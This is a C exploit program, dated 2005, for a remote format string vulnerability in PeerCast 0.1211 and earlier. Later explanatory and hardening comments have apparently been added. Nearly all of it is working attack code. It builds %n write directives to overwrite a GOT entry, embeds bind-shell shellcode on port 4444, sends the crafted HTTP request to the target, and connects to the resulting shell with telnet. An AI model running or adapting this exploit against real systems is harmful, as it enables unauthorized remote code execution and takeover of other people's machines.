
# Title : PeerCast <= 0.1211 Remote Format String Exploit
# Published : 2005-06-20
# Author : darkeagle


/*
		PeerCast <= 0.1211 remote format string exploit 
/			     [<< Public Release >>]

/ by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]  
								
/	uKt researcherz [ http://unl0ck.org ]

/ greetz goes to: uKt researcherz.

/
 - smallest code - better code!!!
/
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>


//*******************************************
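//*******************************************
/*
 * Split a 32-bit address into its four bytes: b0 is the most
 * significant byte, b3 the least significant.  b0..b3 must be plain
 * lvalues (they are assigned to) and addr is evaluated four times, so
 * pass a variable rather than an expression with side effects.
 * Wrapped in do { } while (0) so that "doit(...);" behaves as a single
 * statement.  The line continuations are essential: without them the
 * macro body is just "{" and the four assignments land at file scope.
 */
#define doit( b0, b1, b2, b3, addr )  do {                          \
             (b0) = ((unsigned long)(addr) >> 24) & 0xff;           \
             (b1) = ((unsigned long)(addr) >> 16) & 0xff;           \
             (b2) = ((unsigned long)(addr) >>  8) & 0xff;           \
             (b3) = ((unsigned long)(addr)      ) & 0xff;           \
} while (0)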
//*******************************************



//****************************************************************
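//****************************************************************
/*
 * Payload appended to the request: per the original author it binds a
 * shell on TCP port 4444 (108 bytes, NUL-terminated by the array).
 *
 * It travels inside the HTTP request line and is handled with
 * strcat/strlen, so it must contain no 0x00 and none of the request-line
 * delimiters 0x20, 0x0d, 0x0a; the bytes below satisfy that.
 * NOTE(review): the payload sits in the same string that reaches the
 * vulnerable format call, and it contains a 0x25 ('%') byte; the exploit
 * relies on the target libc tolerating the resulting unknown conversion
 * rather than aborting -- confirm against the target.
 * The hex escapes were restored from a listing that had lost its
 * backslashes ("x31xc9..." is not shellcode, it is the literal text).
 */
char shellcode[] = // binds 4444 port
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";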
//****************************************************************


//****************************
// Target address; also reused verbatim in the follow-up "telnet HOST 4444".
#define HOST "127.0.0.1"
// PeerCast HTTP port the crafted GET request line is sent to.
#define PORT 7144
// First of the four consecutive bytes overwritten through %n.  Per the
// name it is a GOT entry in the PeerCast binary, but which symbol is not
// recorded here -- TODO confirm against the target build; the value is
// build specific.
#define GOTADDR 0x0809da9c
// Value written into GOTADDR: where the shellcode carried in the request
// is expected to sit in the target process.  Target/build specific.
#define SHELLADDR 0x49adb23c
//****************************



//****************************************************************************************
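/*
 * Build the format-string directives that store `retaddr` in memory.
 *
 * The request line already carries four consecutive little-endian
 * addresses (target, target+1, target+2, target+3); on the vulnerable
 * printf's stack they are positional arguments offset..offset+3.  The
 * string returned here is four "%<W>x%<P>$n" pairs: each pads the output
 * by W characters and then stores the running character count into
 * argument P.  The int-sized writes overlap by one byte, so only the low
 * byte of each count survives in its slot: the low byte of the i-th
 * count becomes byte i of the written value, least significant first.
 * Adding 256 to every width keeps the counts strictly increasing, so
 * every low byte is reachable by padding alone.
 *
 * retaddr  value to store (the exploit passes SHELLADDR)
 * offset   positional index of the first address on the target's stack
 * base     characters the target has already counted before the first
 *          %n; subtracted from the first width, together with the 16
 *          address bytes that precede the directives, so the counts
 *          line up with the request as sent (the caller passes 4)
 * figure   correction subtracted (mod 256) from every byte of retaddr
 *          before widths are derived; the caller passes 0x10 -- exploit
 *          tuning whose origin is not recorded here
 *
 * Returns a NUL-terminated heap string of BUF_LEN bytes, zero-filled past
 * the text (the caller frees it), or NULL if allocation fails.
 *
 * NOTE(review): POSIX leaves mixing numbered ("%P$n") and unnumbered
 * ("%Wx") directives undefined; the exploit relies on the target libc
 * accepting the mix.
 */
char *
evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
{
  enum { BUF_LEN = 999, PAD = 256, ADDR_BYTES = 16 };
  unsigned char byte[4];   /* byte[0] = least significant byte of retaddr */
  int width[4];
  char * out;
  int i;

  /* Split retaddr into bytes and apply the correction; the subtraction
   * wraps modulo 256 exactly as the original unsigned char math did. */
  for (i = 0; i < 4; i++)
    byte[i] = (unsigned char)((long)((retaddr >> (8 * i)) & 0xff) - figure);

  /* First width is relative to what was already printed; each later
   * width is the (mod 256) distance from the previous byte to this one. */
  width[0] = (int)byte[0] - ADDR_BYTES + PAD - (int)base;
  for (i = 1; i < 4; i++)
    width[i] = (int)byte[i] - (int)byte[i - 1] + PAD;

  out = calloc(BUF_LEN, 1);   /* zero-filled: callers write past strlen() */
  if (out == NULL)
    return NULL;

  snprintf( out, BUF_LEN,
            "%%%dx%%%u$n%%%dx%%%u$n%%%dx%%%u$n%%%dx%%%u$n",
            width[0], offset,
            width[1], offset + 1,
            width[2], offset + 2,
            width[3], offset + 3 );

  return out;
}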
//****************************************************************************************




//****************************************************************************************
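/*
 * Append n bytes of src to dst (capacity cap, *used bytes filled so far)
 * and keep dst NUL-terminated.  Returns 0, or -1 if the data would not
 * fit with room left for the terminator.
 */
static int
append_bytes( char * dst, size_t cap, size_t * used, const void * src, size_t n )
{
  if (n >= cap - *used)
    return -1;
  memcpy(dst + *used, src, n);
  *used += n;
  dst[*used] = '\0';
  return 0;
}

/*
 * Entry point.  Builds one HTTP request line for PeerCast, sends it to
 * HOST:PORT, then hands the operator a telnet session to the bind shell.
 * No argv handling: host, port and addresses are compiled in.
 *
 * Request layout, in order:
 *   "GET /html/en/index.html"     path the target passes to its format call
 *   GOTADDR, +1, +2, +3           four little-endian addresses (16 bytes),
 *                                 positional args offset..offset+3
 *   evil_builder(SHELLADDR, ...)  four %Wx%P$n pairs that write SHELLADDR
 *   32 x 0x55                     filler kept from the original (presumably
 *                                 a sled; 0x55 is push %ebp on x86)
 *   shellcode                     bind shell on 4444
 *   "\r\n\r\n\r\n"                request terminator
 *
 * Returns 0 after the telnet session ends, 1 on any setup or send error.
 */
int
main( int argc, char * argv[] )
{
  struct sockaddr_in addr;
  int sock;
  char * fmt;
  char endian[31337], da_shell[31337];
  unsigned long locaddr, retaddr;
  unsigned int offset, base;
  unsigned char b0, b1, b2, b3;
  unsigned char addrs[16];
  unsigned char filler[32];
  size_t used = 0, off = 0;
  ssize_t sent;
  int i;

  (void)argc;
  (void)argv;

  /* The original ran system("clear") first; dropped as cosmetic. */
  printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit ^*^*^*\n");
  printf("*^*^*^                    by Darkeagle                 ^*^*^*\n");
  printf("*^*^*^      uKt researcherz [ http://unl0ck.org ]      ^*^*^*\n\n");

  memset( &addr, 0, sizeof addr );
  addr.sin_family = AF_INET;
  addr.sin_port = htons(PORT);
  addr.sin_addr.s_addr = inet_addr(HOST);
  if (addr.sin_addr.s_addr == INADDR_NONE) {
    fprintf(stderr, "[-] Bad host address: %s\n", HOST);
    return 1;
  }

  sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
  if (sock < 0) {
    perror("[-] socket");
    return 1;
  }

  locaddr = GOTADDR;
  retaddr = SHELLADDR;
  offset  = 1265; // GET /html/en/index.htmlAAA%1265$x and you will get AAAA41414141
                  // (that is how the positional index of our data was measured)
  base    = 4;

  /* Split the write target into bytes, b0 most significant. */
  b0 = (locaddr >> 24) & 0xff;
  b1 = (locaddr >> 16) & 0xff;
  b2 = (locaddr >>  8) & 0xff;
  b3 = (locaddr      ) & 0xff;

  /* Only the low byte is bumped for target+1..+3, so a low byte above
   * 0xfc would wrap instead of carrying into b2, and a zero byte would
   * end the C string early.  Refuse both rather than send garbage. */
  if (b3 > 0xfc || b0 == 0 || b1 == 0 || b2 == 0 || b3 == 0) {
    fprintf(stderr, "[-] GOTADDR 0x%08lx has a zero byte or low byte > 0xfc\n", locaddr);
    close(sock);
    return 1;
  }
  for (i = 0; i < 4; i++) {
    addrs[4 * i + 0] = (unsigned char)(b3 + i);   /* little-endian */
    addrs[4 * i + 1] = b2;
    addrs[4 * i + 2] = b1;
    addrs[4 * i + 3] = b0;
  }
  memset(filler, 0x55, sizeof filler);

  printf("[*] Buildin' evil code\n");
  fmt = evil_builder( retaddr, offset, base, 0x10 );
  if (fmt == NULL) {
    fprintf(stderr, "[-] Out of memory\n");
    close(sock);
    return 1;
  }

  /* Assemble the request in endian[] with explicit bounds instead of the
   * original strcat chain (which also wrote past fmt's own text). */
  if (append_bytes(endian, sizeof endian, &used, "GET /html/en/index.html",
                   strlen("GET /html/en/index.html")) != 0 ||
      append_bytes(endian, sizeof endian, &used, addrs, sizeof addrs) != 0 ||
      append_bytes(endian, sizeof endian, &used, fmt, strlen(fmt)) != 0 ||
      append_bytes(endian, sizeof endian, &used, filler, sizeof filler) != 0 ||
      append_bytes(endian, sizeof endian, &used, shellcode, strlen(shellcode)) != 0 ||
      append_bytes(endian, sizeof endian, &used, "\r\n\r\n\r\n", 6) != 0) {
    fprintf(stderr, "[-] Request does not fit in the buffer\n");
    free(fmt);
    close(sock);
    return 1;
  }
  free(fmt);
  printf("[+] Buildin' complete!\n");

  /* HOST is a compile-time literal, so this command line carries no
   * attacker-controlled text; revisit if HOST ever comes from argv. */
  snprintf(da_shell, sizeof da_shell, "telnet %s 4444", HOST);

  // just go, y0!
  printf("[*] Connectin'\n");
  if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) != 0 ) {
    perror("[-] Connection failed!");
    close(sock);
    return 1;
  }

  printf("[+] Connected!\n");
  printf("[*] Sleepin'\n");
  sleep(1);

  printf("[*] Sendin'\n");
  while (off < used) {
    sent = send(sock, endian + off, used - off, 0);
    if (sent <= 0) {
      perror("[-] send");
      close(sock);
      return 1;
    }
    off += (size_t)sent;
  }

  printf("[*] Sleepin'\n");
  sleep(1);

  printf("[*] Connectin' in da shell\n\n");
  sleep(1);
  system(da_shell);
  close(sock);   /* kept open until here, as the original never closed it */
  return 0;
}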
//****************************************************************************************
